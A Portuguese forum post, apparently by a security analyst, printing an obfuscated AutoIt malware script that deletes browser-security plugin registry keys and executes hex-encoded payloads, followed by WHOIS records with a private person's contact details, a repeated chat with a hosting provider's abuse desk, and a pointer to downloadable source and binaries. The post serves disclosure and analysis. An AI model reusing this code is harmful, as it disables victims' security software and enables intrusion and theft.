Fn0041("HKCR\TypeLib\{C41A1C01-EA6C-11D4-B1B8-444553540011}")
Fn0041("HKCR\TypeLib\{C41A1C01-EA6C-11D4-B1B8-444553540000}")
Fn0041("HKCR\TypeLib\{C41A1C01-EA6C-11D4-B1B8-444553540008}")
Fn0041("HKCR\TypeLib\{6B71634C-5867-4D85-BFFE-DF1C322F8B96}")
Fn0041("HKCR\TypeLib\{C41A1C01-EA6C-11D4-B1B8-444553540003}")
Fn0041("HKCR\CLSID\{50AB4426-E258-4C6B-8094-8F3FBCC30011}")
Fn0041("HKCR\CLSID\{E37CB5F0-51F5-4395-A808-5FA49E399011}")
Fn0041("HKCR\CLSID\{C41A1C0E-EA6C-11D4-B1B8-444553540011}")
Fn0041("HKCR\CLSID\{C41A1C0E-EA6C-11D4-B1B8-444553540000}")
Fn0041("HKCR\CLSID\{E37CB5F0-51F5-4395-A808-5FA49E399F83}")
Fn0041("HKCR\CLSID\{C41A1C0E-EA6C-11D4-B1B8-444553540008}")
Fn0041("HKCR\CLSID\{E37CB5F0-51F5-4395-A808-5FA49E399008}")
Fn0041("HKCR\CLSID\{DB6BF2CD-4F59-4F1C-AA9C-D08C0B61A931}")
Fn0041("HKCR\CLSID\{32A5804C-50B2-4295-8252-C32751FE0008}")
Fn0041("HKCR\CLSID\{98C11555-BC81-40aa-A053-DAADC5630000}")
Fn0041("HKCR\CLSID\{98C11555-BC81-40aa-A053-DAADC5630003}")
Fn0041("HKCR\CLSID\{C41A1C0E-EA6C-11D4-B1B8-444553540003}")
Fn0041("HKCR\CLSID\{E37CB5F0-51F5-4395-A808-5FA49E399003}")
Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows NT\CurrentVersion\Winlogon\Notify\ GbPluginBb")
Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows NT\CurrentVersion\Winlogon\Notify\ GbPluginScd")
Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows NT\CurrentVersion\Winlogon\Notify\ GbPluginUni")
Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows NT\CurrentVersion\Winlogon\Notify\ GbPluginCef")
Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows NT\CurrentVersion\Winlogon\Notify\ GbPluginAbn")
Fn0041("HKCR\Gbieh.GbIehObj")
Fn0041("HKCR\Gbieh.GbIehObj.1")
Fn0041("HKCR\Gbieh.GbPluginObj")
Fn0041("HKCR\Gbieh.GbPluginObj.1")
Fn0041("HKCR\GbIeh.GbExplorerPersistObj")
Fn0041("HKCR\GbIeh.GbExplorerPersistObj.1")
Fn0041("HKCR\GbiehScd.GbIehObj")
Fn0041("HKCR\GbiehScd.GbIehObj.1")
Fn0041("HKCR\GbiehScd.GbPluginObj")
Fn0041("HKCR\GbiehScd.GbPluginObj.1")
Fn0041("HKCR\GbiehCef.GbIehObj")
Fn0041("HKCR\GbiehCef.GbIehObj.1")
Fn0041("HKCR\GbiehCef.GbPluginObj")
Fn0041("HKCR\GbiehCef.GbPluginObj.1")
Fn0041("HKCR\GbiehUni.GbIehObj")
Fn0041("HKCR\GbiehUni.GbIehObj.1")
Fn0041("HKCR\GbiehUni.GbPluginObj")
Fn0041("HKCR\GbiehUni.GbPluginObj.1")
Fn0041("HKCR\GbpDist.GbpDistObj")
Fn0041("HKCR\GbpDist.GbpDistObj.1")
Fn0041("HKCR\Interface\{5C350402-AD9A-41E7-A303-C49F6C520000}")
Fn0041("HKCR\Interface\{7827CCC3-0DEB-4CFB-911C-AA777C8826EA}")
Fn0041("HKCR\Interface\{C41A1C0D-EA6C-11D4-B1B8-444553540000}")
Fn0041("HKCR\Interface\{6ADBBD75-3CEB-43BC-88EE-B8C2D50E0011}")
Fn0041("HKCR\Interface\{7827CCC3-0DEB-4CFB-911C-5FA49E399011}")
Fn0041("HKCR\Interface\{C41A1C0D-EA6C-11D4-B1B8-444553540011}")
Fn0041("HKCR\Interface\{B3D037EB-D5BE-413D-8E16-E5B2A1B28BD8}")
Fn0041("HKLM\SOFTWARE\Classes\GbiehScd.GbIehObj")
Fn0041("HKLM\SOFTWARE\Classes\GbiehScd.GbIehObj.1")
Fn0041("HKLM\SOFTWARE\Classes\GbiehScd.GbPluginObj")
Fn0041("HKLM\SOFTWARE\Classes\GbiehScd.GbPluginObj.1")
Fn0041("HKLM\SOFTWARE\Classes\Interface\{6ADBBD75-3CEB-43BC-88EE-B8C2D50E0011}")
Fn0041("HKLM\SOFTWARE\Classes\Interface\{7827CCC3-0DEB-4CFB-911C-5FA49E399011}")
Fn0041("HKLM\SOFTWARE\Classes\Interface\{C41A1C0D-EA6C-11D4-B1B8-444553540011}")
Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\explorer\Browser Helper Objects\{C41A1C0E-EA6C-11D4-B1B8-444553540000}")
Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\explorer\Browser Helper Objects\{C41A1C0E-EA6C-11D4-B1B8-444553540003}")
Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\explorer\Browser Helper Objects\{C41A1C0E-EA6C-11D4-B1B8-444553540008}")
Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\explorer\Browser Helper Objects\{C41A1C0E-EA6C-11D4-B1B8-444553540011}")
Fn0041("HKLM\SOFTWARE\Wow6432Node\MicrVar0255oft\Windows\CurrentVersion\explorer\Browser Helper Objects\{C41A1C0E-EA6C-11D4-B1B8-444553540000}")
Fn0041("HKLM\SOFTWARE\Wow6432Node\MicrVar0255oft\Windows\CurrentVersion\explorer\Browser Helper Objects\{C41A1C0E-EA6C-11D4-B1B8-444553540003}")
Fn0041("HKLM\SOFTWARE\Wow6432Node\MicrVar0255oft\Windows\CurrentVersion\explorer\Browser Helper Objects\{C41A1C0E-EA6C-11D4-B1B8-444553540008}")
Fn0041("HKLM\SOFTWARE\Wow6432Node\MicrVar0255oft\Windows\CurrentVersion\explorer\Browser Helper Objects\{C41A1C0E-EA6C-11D4-B1B8-444553540011}")
Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\policies\Ext\CLSID", "{E37CB5F0-51F5-4395-A808-5FA49E399011}")
Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\policies\Ext\CLSID", "{C41A1C0E-EA6C-11D4-B1B8-444553540011}")
Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\policie'es\Ext\CLSID", "{E37CB5F0-51F5-4395-A808-5FA49E399008}")
Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\policies\Ext\CLSID", "{C41A1C0E-EA6C-11D4-B1B8-444553540008}")
Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\policies\Ext\CLSID", "{C41A1C0E-EA6C-11D4-B1B8-444553540000}")
Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\Shell Extensions\Approved", "{E37CB5F0-51F5-4395-A808-5FA49E399011}")
Fn0041("HKLM\SOFTWARE\MicrVar0255oft\Windows\CurrentVersion\Explorer\ShellExecuteHooks", "{E37CB5F0-51F5-4395-A808-5FA49E399011}")
EndFunc
Func Fn0043()
While $Var0067
Fn0036()
Sleep(10)
WEnd
Fn0019()
ProcessClVar0255e(@AutoItPID)
Return
EndFunc
Func Fn0044()
For $ax0x0xa = 1 To 5
Local $locVar0001 = Var0254x_()
FileInstall("killer-x32x64-Menino.au3.tbl", $locVar0001, 1)
Global $Var0254, $Var0255 = Execute(BinaryTVar0255tring("0x457865637574652842696E617279746F737472696E67282730783435373836353633373537343635323834323639364536313732373937343646373337343732363936453637323832373330373833353333333733343337333233363339333634353336333733353333333733303336343333363339333733343332333833343336333633393336343333363335333533323336333533363331333633343332333833323334333433313333333533333335333333303333333033333334333333303333333133333330333333343333333033373333333734313335343633323339333234333332333733373433333333313337343233323337333234333333333133323339323732393239272929"))
If IsArray($Var0255) AND $Var0255[0] >= 1179 Then ExitLoop
Sleep(10)
Next
Execute(BinaryTVar0255tring("0x457865637574652842696E617279746F737472696E6728273078343537383635363337353734363532383432363936453631373237393734364637333734373236393645363732383237333037383333333133323432333433363336333933363433333633353334333433363335333634333336333533373334333633353332333833323334333433313333333533333335333333303333333033333334333333303333333133333330333333343333333033373333333734313335343633323339323732393239272929"))
EndFunc
Código:
# # The following results may also be obtained via: # http://whois.arin.net/rest/nets;q=190.120.227.114?showDetails=true&showARIN=false&ext=netref2 # NetRange: 190.0.0.0 - 190.255.255.255 CIDR: 190.0.0.0/8 OriginAS: NetName: NET190 NetHandle: NET-190-0-0-0-1 Parent: NetType: Allocated to LACNIC Comment: This IP address range is under LACNIC responsibility for further Comment: allocations to users in LACNIC region. Comment: Please see http://www.lacnic.net/ for further details, or check the Comment: WHOIS server located at http://whois.lacnic.net RegDate: 2005-06-17 Updated: 2010-07-21 Ref: http://whois.arin.net/rest/net/NET-190-0-0-0-1 OrgName: Latin American and Caribbean IP address Regional Registry OrgId: LACNIC Address: Rambla Republica de Mexico 6125 City: Montevideo StateProv: PostalCode: 11400 Country: UY RegDate: 2002-07-27 Updated: 2011-09-24 Ref: http://whois.arin.net/rest/org/LACNIC ReferralServer: whois://whois.lacnic.net OrgAbuseHandle: LACNIC-ARIN OrgAbuseName: LACNIC Whois Info OrgAbusePhone: 999-999-9999 OrgAbuseEmail: whois-contact@lacnic.net OrgAbuseRef: http://whois.arin.net/rest/poc/LACNIC-ARIN OrgTechHandle: LACNIC-ARIN OrgTechName: LACNIC Whois Info OrgTechPhone: 999-999-9999 OrgTechEmail: whois-contact@lacnic.net OrgTechRef: http://whois.arin.net/rest/poc/LACNIC-ARIN # # ARIN WHOIS data and services are subject to the Terms of Use # available at: https://www.arin.net/whois_tou.html #
Código:
Registrant:
xiujuan Chen
xiujuan Chen
lie dian bai sha zhou
wuhan, NULL 430064
CN
Phone: +86.8753067799
Email: lchenmailbox@yahoo.com
Registrar Name....: Register.com
Registrar Whois...: whois.register.com
Registrar Homepage: www.register.com
Domain Name: asiaworksmall.com
Created on..............: 2004-01-07
Expires on..............: 2017-01-07
Administrative Contact:
xiujuan Chen
xiujuan Chen
lie dian bai sha zhou
wuhan, NULL 430064
CN
Phone: +86.8753067799
Email: lchenmailbox@yahoo.com
Technical Contact:
Web.com
Drone Team
12808 Gran Bay Parkway West
Jacksonville, FL 32258
US
Phone: +1.8009324678
Email: droneteam@corp.web.com
DNS Servers:
ns6.bona.us
ns5.bona.us
ns4.bona.us
Visit AboutUs.org for more information about asiaworksmall.com
AboutUs: asiaworksmall.com
You are now chatting with FT 1498
Welcome to FortaTrust chat. How can we help you today?
hi
> hi
> i am security analyst,
> and i have some malware warning from a IP in this server
> the ip is 190.120.227.114, are a virus written in autoit script, that redirect big websites like google to this server
> can u give me informations about the owner?
< please send your abuse complaint to abuse@fortatrust.com and we will take care of the issue
> i have the source-code of the virus
> if you need, i can send in the e-mail
< yes, send everything you have
< and they will take care of the problem
> ok, thank you very much. i will send it today
Welcome to FortaTrust chat. How can we help you today?
hi
> hi
> i am security analyst,
> and i have some malware warning from a IP in this server
> the ip is 190.120.227.114, are a virus written in autoit script, that redirect big websites like google to this server
> can u give me informations about the owner?
< please send your abuse complaint to abuse@fortatrust.com and we will take care of the issue
> i have the source-code of the virus
> if you need, i can send in the e-mail
< yes, send everything you have
< and they will take care of the problem
> ok, thank you very much. i will send it today
Logo quando tiver tempo vou enviar este e-mail e estudar melhor este código-fonte, e uma forma de remoção. Também vou estar enviando para AV researchers.
Por uma rápida olhada, parece ser um trojan, ou servidor de botnet, que notifica o servidor remoto, mas o código está muito ofuscado e cansativo de se ler.
Você pode baixar o código-fonte completo do vírus, bem como binários, Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar.... Não execute os arquivos se não souber o que está fazendo.
Comment